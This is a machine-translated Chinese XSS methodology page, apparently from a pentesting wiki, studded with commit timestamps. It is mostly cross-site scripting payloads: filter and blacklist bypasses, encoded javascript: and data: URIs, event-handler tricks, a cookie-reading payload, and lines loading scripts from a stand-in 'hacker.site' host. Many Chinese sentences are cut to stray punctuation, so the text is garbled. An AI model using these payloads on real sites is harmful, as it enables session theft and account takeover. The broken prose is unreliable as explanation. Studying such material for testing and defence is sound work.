2023-08-03 19:12:22 +00:00
# XSS( )
2022-04-28 16:01:33 +00:00
2023-03-05 22:20:47 +00:00
/< img src = "../../.gitbook/assets/i3.png" alt = "" data-size = "original" >
2022-04-30 20:31:18 +00:00
2023-10-16 21:15:46 +00:00
**赏金猎人提示**: , , ! :
2022-04-30 20:31:18 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
## 方法论
1. 检查是否有**任何你可以控制的值**( , , ? , ? )
2. 找到它被反射/使用的**上下文**。
2023-10-16 21:15:46 +00:00
3. 如果是**反射**的:
2023-08-03 19:12:22 +00:00
1. 检查你可以使用哪些符号,并根据此准备有效载荷:
1. 在**原始HTML**中:
2023-10-16 21:15:46 +00:00
1. 你能创建新的HTML标签吗?
2. 你能使用支持`javascript:`协议的事件或属性吗?
3. 你能绕过保护措施吗?
4. HTML内容是否由任何客户端JS引擎( , ,
5. 如果你无法创建执行JS代码的HTML标签,
2023-08-24 09:57:53 +00:00
2. 在**HTML标签内部**:
2023-10-16 21:15:46 +00:00
1. 你能退出到原始HTML上下文吗?
2. 你能创建新的事件/属性来执行JS代码吗?
2023-08-03 19:12:22 +00:00
3. 你被困在的属性是否支持JS执行?
2023-10-16 21:15:46 +00:00
4. 你能绕过保护措施吗?
2023-08-24 09:57:53 +00:00
3. 在**JavaScript代码内部**:
2023-10-16 21:15:46 +00:00
1. 你能转义`< script > `标签吗?
2. 你能转义字符串并执行不同的JS代码吗?
2023-08-03 19:12:22 +00:00
3. 你的输入是否在模板文字\`\`中?
2023-10-16 21:15:46 +00:00
4. 你能绕过保护措施吗?
4. 正在**执行的**JavaScript **函数**
2023-08-03 19:12:22 +00:00
1. 你可以指定要执行的函数名称。例如:`?callback=alert(1)`
2023-10-16 21:15:46 +00:00
4. 如果是**使用**的:
2023-08-08 08:33:05 +00:00
1. 你可以利用**DOM XSS**,注意你的输入如何受控制以及你的**受控输入是否被任何漏洞利用点使用**。
2023-08-03 19:12:22 +00:00
在处理复杂的XSS时, :
2022-04-25 12:04:04 +00:00
{% content-ref url="debugging-client-side-js.md" %}
[debugging-client-side-js.md ](debugging-client-side-js.md )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## 反射的值
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
为了成功利用XSS,
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
* **中间反射**:如果你发现参数的值甚至路径的值在网页中被反射,你可以利用**反射型XSS**。
2023-08-24 09:57:53 +00:00
* **存储和反射**:如果你发现一个由你控制的值被保存在服务器中,并且每次访问页面时都会被反射,你可以利用**存储型XSS**。
2023-10-16 21:15:46 +00:00
* **通过JS访问**: ,
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 上下文
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在尝试利用XSS时, ,
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 原始HTML
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果你的输入在**原始HTML**页面中被反射,你需要滥用一些**HTML标签**以执行JS代码: < img , < iframe , < svg , < script ` . . . 这只是你可以使用的众多可能的HTML标签之一 。 \
此外,请记住[客户端模板注入](../client-side-template-injection-csti.md)。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 在HTML标签属性内部
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
如果你的输入在标签的属性值中被反射,你可以尝试以下方法:
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
1. **从属性和标签中逃脱** ( ) , : < img [...]`
2. 如果你**可以从属性中逃脱但无法从标签中逃脱**( :
2023-08-24 09:57:53 +00:00
3. 如果你**无法从属性中逃脱**(
2023-08-08 08:33:05 +00:00
4. 如果你的输入被反射在“**无法利用的标签**”中,你可以尝试使用**`accesskey`**技巧来滥用漏洞(你将需要某种社交工程来利用这个):**`" accesskey="x" onclick="alert(1)" x="`**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 在JavaScript代码内部
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
在这种情况下, < script > [ ... ] < / script > `**标签之间,在`.js`文件中或在使用**`javascript:`**协议的属性中:
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
* 如果被反射在**`< script > [...] </ script > `**标签之间,即使你的输入在任何引号中,你可以尝试注入`</ script > `并从此上下文中逃脱。这是因为**浏览器首先解析HTML标签**,然后解析内容,因此它不会注意到你注入的`</ script > `标签在HTML代码中。
* 如果被反射在**JS字符串内部**,并且上述技巧不起作用,你需要**退出**字符串,**执行**你的代码,并**重构**JS代码( , ) :
2020-07-15 15:43:14 +00:00
* `'-alert(1)-'`
* `';-alert(1)//`
2023-08-08 08:33:05 +00:00
* `\'alert(1)//`
2023-10-16 21:15:46 +00:00
* 如果被反射在模板文字中,你可以使用`${ ... }`语法嵌入JS表达式: `Hello, ${alert(1)}` ``
2023-08-08 08:33:05 +00:00
* **Unicode编码**可用于编写**有效的javascript代码**:
2023-02-07 10:56:16 +00:00
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
2023-08-03 19:12:22 +00:00
#### Javascript 提升
2022-06-24 08:34:11 +00:00
2023-08-03 19:12:22 +00:00
Javascript 提升是指在使用之后声明函数、变量或类的机会。
2022-06-24 08:34:11 +00:00
2023-08-08 08:33:05 +00:00
因此, , ( , ) :
2022-06-24 08:34:11 +00:00
```javascript
// The function vulnerableFunction is not defined
2023-08-03 19:12:22 +00:00
vulnerableFunction('test', '< INJECTION > ');
2022-06-24 08:34:11 +00:00
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
```
```javascript
// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
2023-08-03 19:12:22 +00:00
return 1
2022-06-24 08:34:11 +00:00
};
myFunction(a, '< INJECTION > ')
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);
```
```javascript
// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
< INJECTION >
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
2023-08-03 19:12:22 +00:00
return 1;
2022-06-24 08:34:11 +00:00
}
alert(1);
```
```javascript
// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesn´
// cannot be fixed if you can only inject after that code:
test.cookie('leo','INJECTION')
test['cookie','injection']
```
2023-08-03 19:12:22 +00:00
有关JavaScript提升的更多信息, :
2022-06-24 08:34:11 +00:00
2023-08-03 19:12:22 +00:00
### JavaScript函数
2022-06-23 12:12:25 +00:00
2023-08-03 19:12:22 +00:00
几个网页有端点,**接受函数名称作为参数来执行**。一个常见的例子是:`?callback=callbackFunc`。
2022-06-23 12:12:25 +00:00
2023-08-24 09:57:53 +00:00
一个好的方法来判断用户直接提供的内容是否尝试执行是**修改参数值**(例如改为'Vulnerable'),并在控制台查找错误,例如:
2022-06-23 12:12:25 +00:00
2022-06-27 08:48:17 +00:00
 ( 2 ) . png > )
2022-06-23 12:12:25 +00:00
2023-08-03 19:12:22 +00:00
如果存在漏洞,你可以通过发送值**`?callback=alert(1)`**来**触发警报**。然而,这些端点通常会**验证内容**,只允许字母、数字、点和下划线(**`[\w\._]`**)。
2022-06-23 12:12:25 +00:00
2023-08-03 19:12:22 +00:00
然而,即使有这个限制,仍然可以执行一些操作。这是因为你可以使用这些有效的字符来**访问DOM中的任何元素**:
2022-06-23 12:12:25 +00:00
 . png > )
2023-08-03 19:12:22 +00:00
一些有用的函数:
2022-06-23 12:12:25 +00:00
```
firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement
```
2023-08-03 19:12:22 +00:00
您还可以尝试直接**触发JavaScript函数**:
2022-06-23 12:12:25 +00:00
2023-08-03 19:12:22 +00:00
然而, ,
2022-06-23 12:12:25 +00:00
2023-08-08 08:33:05 +00:00
因此, ( )
2022-06-23 12:12:25 +00:00
{% content-ref url="some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md ](some-same-origin-method-execution.md )
{% endcontent-ref %}
2022-05-01 16:57:45 +00:00
### DOM
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
有一些**JS代码**正在**不安全地**使用由攻击者控制的一些数据,如`location.href`。攻击者可以滥用此功能来执行任意JS代码。
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="dom-xss.md" %}
[dom-xss.md ](dom-xss.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2023-08-03 19:12:22 +00:00
### **通用XSS**
2021-05-27 11:59:23 +00:00
2023-10-16 21:15:46 +00:00
这种类型的XSS可以在**任何地方**找到。它们不仅依赖于对Web应用程序的客户端利用,
2023-08-03 19:12:22 +00:00
一些**示例**:
2021-05-27 11:59:23 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md ](server-side-xss-dynamic-pdf.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2022-05-01 13:25:53 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/" %}
[xss-to-rce-electron-desktop-apps ](../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2023-08-03 19:12:22 +00:00
## WAF绕过编码图像
2020-07-15 15:43:14 +00:00
2023-06-06 22:57:49 +00:00
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 在原始HTML中注入
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
当您的输入被反射**在HTML页面中**或者您可以在此上下文中转义和注入HTML代码时, < `来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML编码**或**删除**,或者是否**未经更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
2023-10-16 21:15:46 +00:00
对于这些情况,还要**记住**[**客户端模板注入**](../client-side-template-injection-csti.md)**。**\
2023-08-08 08:33:05 +00:00
_**注意: ** **`-->`**** ** **或**** ** **`--!>`**_。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在这种情况下,如果没有使用黑名单/白名单,您可以使用以下有效负载:
2020-07-15 15:43:14 +00:00
```javascript
< script > alert ( 1 ) < / script >
< img src = x onerror = alert(1) / >
< svg onload = alert('XSS') >
```
2023-08-03 19:12:22 +00:00
但是,如果使用了标签/属性的黑名单/白名单,你需要**暴力破解可以创建的标签**。\
一旦你**找到了允许的标签**,你需要**暴力破解找到的有效标签内的属性/事件**,以查看如何攻击上下文。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 标签/事件的暴力破解
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
访问[**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet), , , , ( , )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 自定义标签
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果你没有找到任何有效的HTML标签, , ,
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/?search=< xss + id % 3dx + onfocus % 3dalert ( document . cookie ) + tabindex % 3d1 > #x
```
2023-08-03 19:12:22 +00:00
### 黑名单绕过
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果使用了某种黑名单,您可以尝试使用一些愚蠢的技巧来绕过它:
2020-07-15 15:43:14 +00:00
```javascript
//Random capitalization
< script > - - > < S c r I p T >
< img -- > < ImG
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Double tag, in case just the first match is removed
< script > < s c r i p t >
2021-06-02 22:22:26 +00:00
< scr < script > ipt>
2020-07-15 15:43:14 +00:00
< SCRscriptIPT > alert(1)< / SCRscriptIPT >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Unexpected parent tags
< svg > < x > < script > a l e r t ( ' 1 ' & # 4 1 < / x >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Unexpected weird attributes
< script x >
< script a = "1234" >
< script ~ ~ ~ >
2021-06-02 22:22:26 +00:00
< script / random > alert ( 1 ) < / script >
< script / / / Note the newline
>alert(1)< / script >
< scr \x00ipt > alert(1)</ scr \x00ipt >
2020-07-15 15:43:14 +00:00
//Not closing tag, ending with " < " or " //"
< iframe SRC = "javascript:alert('XSS');" <
< iframe SRC = "javascript:alert('XSS');" / /
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Extra open
< < script > alert ( "XSS" ) ; / / < < / script >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Just weird an unexpected, use your imagination
< < /script/script>< script >
< input type = image src onerror = "prompt(1)" >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Using `` instead of parenthesis
2021-06-02 22:22:26 +00:00
onerror=alert`1`
2020-07-15 15:43:14 +00:00
//Use more than one
< < TexTArEa / * % 00 / / % 00 * / a = "not" / * % 00 / / / AutOFocUs / / / / onFoCUS = alert`1` / /
```
2023-08-03 19:12:22 +00:00
### 长度绕过( )
2020-07-15 15:43:14 +00:00
2022-02-18 15:49:34 +00:00
{% hint style="info" %}
2023-08-08 08:33:05 +00:00
**可以在这里找到更多适用于不同环境的小型XSS负载** [**链接** ](https://github.com/terjanq/Tiny-XSS-Payloads ) 和 [**链接** ](https://tinyxss.terjanq.me )。
2022-02-18 15:49:34 +00:00
{% endhint %}
```html
<!-- Taken from the blog of Jorge Lajara -->
2020-07-15 15:43:14 +00:00
< svg / onload = alert`` >
< script src = //aa.es >
< script src = //℡㏛.pw >
```
2023-08-03 19:12:22 +00:00
最后一个是使用2个Unicode字符, :
可以在[这里](https://www.unicode.org/charts/normalization/)找到更多这些字符。\
要检查哪些字符被分解,请查看[这里](https://www.compart.com/en/unicode/U+2121)。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 点击XSS - 点击劫持
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
如果为了利用漏洞,您需要**用户点击一个带有预填数据的链接或表单**,您可以尝试[**滥用点击劫持**](../clickjacking.md#xss-clickjacking)(如果页面存在漏洞)。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 不可能 - 悬挂标记
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
如果您认为**不可能创建一个带有属性以执行JS代码的HTML标记**,您应该检查[**悬挂标记**](../dangling-markup-html-scriptless-injection/),因为您可以在**不执行**JS**代码的情况下**利用漏洞。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 在HTML标记中注入
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 在标记内部/从属性值中逃逸
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果您在**HTML标记内部**,您可以尝试**逃逸**标记并使用[上一节](./#injecting-inside-raw-html)中提到的一些技术来执行JS代码。\
2023-08-24 09:57:53 +00:00
如果**无法逃逸标记**, , , ( , , , , ) :
2022-03-21 17:05:35 +00:00
```bash
2020-07-15 15:43:14 +00:00
" autofocus onfocus=alert(document.domain) x="
2022-03-21 17:05:35 +00:00
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
**样式事件**
2023-10-16 21:15:46 +00:00
Style events are a type of Cross-Site Scripting (XSS) attack that allows an attacker to inject malicious code into a website by exploiting vulnerabilities in the way the website handles user input. These events occur when the website's code dynamically updates the style or appearance of certain elements based on user input.
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
攻击者可以通过利用网站处理用户输入的漏洞, , ( ) ( , )
2021-02-25 11:06:26 +00:00
2023-10-16 21:15:46 +00:00
By injecting malicious code into the website's input fields, an attacker can manipulate the style events triggered by user interactions. This can lead to various consequences, such as changing the appearance of the website, redirecting users to malicious websites, or stealing sensitive information.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
通过向网站的输入字段注入恶意代码,攻击者可以操纵由用户交互触发的样式事件。这可能导致各种后果,例如改变网站的外观,将用户重定向到恶意网站,或窃取敏感信息。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
To prevent style events XSS attacks, it is important for developers to properly sanitize and validate user input, especially when it is used to dynamically update the style or appearance of elements on a website. Additionally, implementing Content Security Policy (CSP) headers can help mitigate the risk of XSS attacks by restricting the sources from which the website can load external scripts.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
为了防止样式事件的跨站脚本攻击, , , ( , )
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
It is crucial for website owners and developers to stay updated on the latest security best practices and regularly test their websites for vulnerabilities, including XSS attacks. By proactively addressing these issues, they can protect their users' data and maintain the integrity of their websites.
2021-02-25 11:06:26 +00:00
```python
< p style = "animation: x;" onanimationstart = "alert()" > XSS< / p >
< p style = "animation: x;" onanimationend = "alert()" > XSS< / p >
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
< div style = "position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick = "alert(1)" > < / div >
#moving your mouse anywhere over the page (0-click-ish):
< div style = "position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover = "alert(1)" > < / div >
```
2023-08-03 19:12:22 +00:00
### 在属性中
2021-02-25 11:06:26 +00:00
2023-08-08 08:33:05 +00:00
即使你**无法从属性中逃脱**(
2023-08-03 19:12:22 +00:00
另一个有趣的例子是属性`href`,你可以使用`javascript:`协议来执行任意代码:**`href="javascript:alert(1)"`**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**在事件中使用HTML编码/URL编码绕过**
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
HTML标签属性值中的**HTML编码字符**会在运行时解码。因此, ( ) : < a id = "author" href = "http://none" onclick = "var tracker='http://foo?`**`'-alert(1)-'`**`';" > Go Back < / a > `
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
请注意,**任何类型的HTML编码都是有效的**:
2020-07-15 15:43:14 +00:00
```javascript
//HTML entities
' -alert(1)-'
//HTML hex without zeros
& #x27-alert(1)-& #x27
//HTML hex with zeros
& #x00027-alert(1)-& #x00027
//HTML dec without zeros
& #39-alert(1)-& #39
//HTML dec with zeros
& #00039-alert(1)-& #00039
2023-03-03 17:26:17 +00:00
< a href = "javascript:var a=''-alert(1)-''" > a< / a >
< a href = "javascript:alert(2)" > a< / a >
< a href = "javascript:alert(3)" > a< / a >
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
**请注意, :
2020-07-15 15:43:14 +00:00
```python
< a href = "https://example.com/lol%22onmouseover=%22prompt(1);%20img.png" > Click< / a >
```
2023-08-03 19:12:22 +00:00
**使用Unicode编码绕过内部事件**
2023-10-16 21:15:46 +00:00
In some cases, web applications may have input validation mechanisms that filter out certain characters or strings to prevent cross-site scripting (XSS) attacks. However, it is possible to bypass these filters by using Unicode encoding.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
在某些情况下, , , ( ) ,
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
Unicode encoding allows us to represent characters using their corresponding Unicode code points. By encoding malicious JavaScript code using Unicode, we can evade input filters that are not designed to handle Unicode-encoded characters.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
Unicode编码允许我们使用相应的Unicode代码点来表示字符。通过使用Unicode编码来编码恶意的JavaScript代码,
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
To bypass an input filter that blocks certain characters or strings, we can use Unicode encoding to represent those characters in a different form. For example, the character `<` can be represented as `\u003c` in Unicode encoding.
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
为了绕过阻止某些字符或字符串的输入过滤器, , < `可以在Unicode编码中表示为`\u003c`。
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
By encoding the malicious JavaScript code using Unicode, we can bypass input filters that are not specifically designed to handle Unicode-encoded characters. This technique can be used to inject and execute arbitrary JavaScript code in a web application, potentially leading to XSS vulnerabilities.
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
通过使用Unicode编码来编码恶意的JavaScript代码, ,
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
It is important to note that not all input filters can be bypassed using Unicode encoding. Some filters may be specifically designed to handle Unicode-encoded characters and can still detect and block malicious code. Therefore, it is crucial to thoroughly test the application's input validation mechanisms to ensure they are effective in preventing XSS attacks.
2023-08-24 09:57:53 +00:00
2023-10-16 21:15:46 +00:00
需要注意的是, , , ,
2020-07-15 15:43:14 +00:00
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
< img src onerror = \u0061 \u006C \u0065 \u0072 \u0074(1) />
< img src onerror = \u{61} \u{6C} \u{65} \u{72} \u{74}(1) />
```
2023-08-03 19:12:22 +00:00
### 属性中的特殊协议
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在某些地方,您可以使用协议**`javascript:`**或**`data:`**来执行任意的JS代码。有些需要用户交互,
2021-06-02 22:22:26 +00:00
```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript: alert(1)
javascript: alert(1)
javascript: alert(1)
& #x6a& #x61& #x76& #x61& #x73& #x63& #x72& #x69& #x70& #x74& #x3aalert(1)
2023-08-03 19:12:22 +00:00
java //Note the new line
2021-06-02 22:22:26 +00:00
script:alert(1)
data:text/html,< script > alert ( 1 ) < / script >
DaTa:text/html,< script > alert ( 1 ) < / script >
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,< script > alert ( 1 ) < / script >
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
2023-08-03 19:12:22 +00:00
**可以注入这些协议的位置**
2021-06-02 22:22:26 +00:00
2023-08-08 08:33:05 +00:00
**一般来说**, < img > `标签)
2021-07-17 21:10:13 +00:00
```markup
2021-06-02 22:22:26 +00:00
< a href = "javascript:alert(1)" >
< a href = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=" >
< form action = "javascript:alert(1)" > < button > send< / button > < / form >
< form id = x > < / form > < button form = "x" formaction = "javascript:alert(1)" > send< / button >
< object data = javascript:alert(3) >
< iframe src = javascript:alert(2) >
< embed src = javascript:alert(1) >
< object data = "data:text/html,<script>alert(5)</script>" >
< embed src = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type = "image/svg+xml" AllowScriptAccess = "always" > < / embed >
< embed src = "data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" > < / embed >
< iframe src = "data:text/html,<script>alert(5)</script>" > < / iframe >
//Special cases
2023-08-03 19:12:22 +00:00
< object data = "//hacker.site/xss.swf" > .//https://github.com/evilcos/xss.swf
< embed code = "//hacker.site/xss.swf" allowscriptaccess = always > //https://github.com/evilcos/xss.swf
2021-06-02 22:22:26 +00:00
< iframe srcdoc = "<svg onload=alert(4);>" >
```
2023-08-03 19:12:22 +00:00
**其他混淆技巧**
2021-06-02 22:22:26 +00:00
2023-10-16 21:15:46 +00:00
_**在这种情况下, ,
2021-06-02 22:22:26 +00:00
```javascript
< a href = "javascript:var a=''-alert(1)-''" >
```
2023-08-16 09:07:58 +00:00
此外,对于这些情况还有另一个不错的技巧:即使你在`javascript:...`中的输入被URL编码, , , , ,
2020-07-15 15:43:14 +00:00
```javascript
' -alert(1)-'
%27-alert(1)-%27
< iframe src = javascript:%61%6c%65%72%74%28%31%29 > < / iframe >
```
2023-08-03 19:12:22 +00:00
请注意,如果您尝试以任何顺序使用`URLencode + HTMLencode`来编码**payload**,它将**无法正常工作**,但您可以在**payload**中**混合使用它们**。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**使用`javascript:`进行十六进制和八进制编码**
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
您可以在`iframe`的`src`属性中使用**十六进制**和**八进制编码**,以声明要执行的**HTML标签中的JS**:
2020-07-15 15:43:14 +00:00
```javascript
//Encoded: < svg onload = alert(1) >
// This WORKS
< iframe src = javascript:' \x3c \x73 \x76 \x67 \x20 \x6f \x6e \x6c \x6f \x61 \x64 \x3d \x61 \x6c \x65 \x72 \x74 \x28 \x31 \x29 \x3e' />
< iframe src = javascript:' \74 \163 \166 \147 \40 \157 \156 \154 \157 \141 \144 \75 \141 \154 \145 \162 \164 \50 \61 \51 \76' />
//Encoded: alert(1)
// This doesn't work
< svg onload = javascript:' \x61 \x6c \x65 \x72 \x74 \x28 \x31 \x29' />
< svg onload = javascript:' \141 \154 \145 \162 \164 \50 \61 \51' />
```
2023-08-03 19:12:22 +00:00
### 反向标签劫持
2023-08-08 08:33:05 +00:00
Reverse tab nabbing is a type of cross-site scripting (XSS) attack that targets users who have multiple tabs open in their web browser. In this attack, the attacker injects malicious code into a website that the victim is currently viewing. When the victim switches to another tab and then returns to the original tab, the injected code can modify the content of the page and trick the victim into performing unintended actions.
2023-10-16 21:15:46 +00:00
To execute a reverse tab nabbing attack, the attacker typically exploits a vulnerability in the target website that allows them to inject JavaScript code. This code is designed to detect when the victim switches tabs and then modify the content of the page accordingly. For example, the attacker may change the appearance of a login form to mimic a trusted website, leading the victim to enter their credentials unknowingly.
To protect against reverse tab nabbing attacks, website developers should implement proper input validation and output encoding to prevent XSS vulnerabilities. Additionally, users should be cautious when switching between tabs and ensure that they only interact with trusted websites.
### 反向标签劫持
反向标签劫持是一种针对在网络浏览器中打开多个标签的用户的跨站脚本攻击( ) , , , ,
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
要执行反向标签劫持攻击, , , , ,
为了防止反向标签劫持攻击, , , ,
2020-07-15 15:43:14 +00:00
```javascript
2021-06-02 22:22:26 +00:00
< a target = "_blank" rel = "opener"
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
如果您可以在任意的**`< a href = `**标签中注入任何URL, :
2021-05-01 15:23:19 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="../reverse-tab-nabbing.md" %}
[reverse-tab-nabbing.md ](../reverse-tab-nabbing.md )
{% endcontent-ref %}
2021-05-01 15:23:19 +00:00
2023-08-03 19:12:22 +00:00
### on事件处理程序绕过
2021-06-02 22:22:26 +00:00
2023-08-03 19:12:22 +00:00
首先,请查看此页面([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet))以获取有用的**"on"事件处理程序**。\
如果存在一些黑名单阻止您创建此事件处理程序,您可以尝试以下绕过方法:
2021-06-02 22:22:26 +00:00
```javascript
< svg onload % 09 = alert(1) > //No safari
< svg % 09onload = alert(1) >
< svg % 09onload % 20 = alert(1) >
< svg onload % 09 % 20 % 28 % 2c % 3b = alert(1) >
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
2023-08-08 08:33:05 +00:00
### 在"无法利用的标签"中的XSS攻击( )
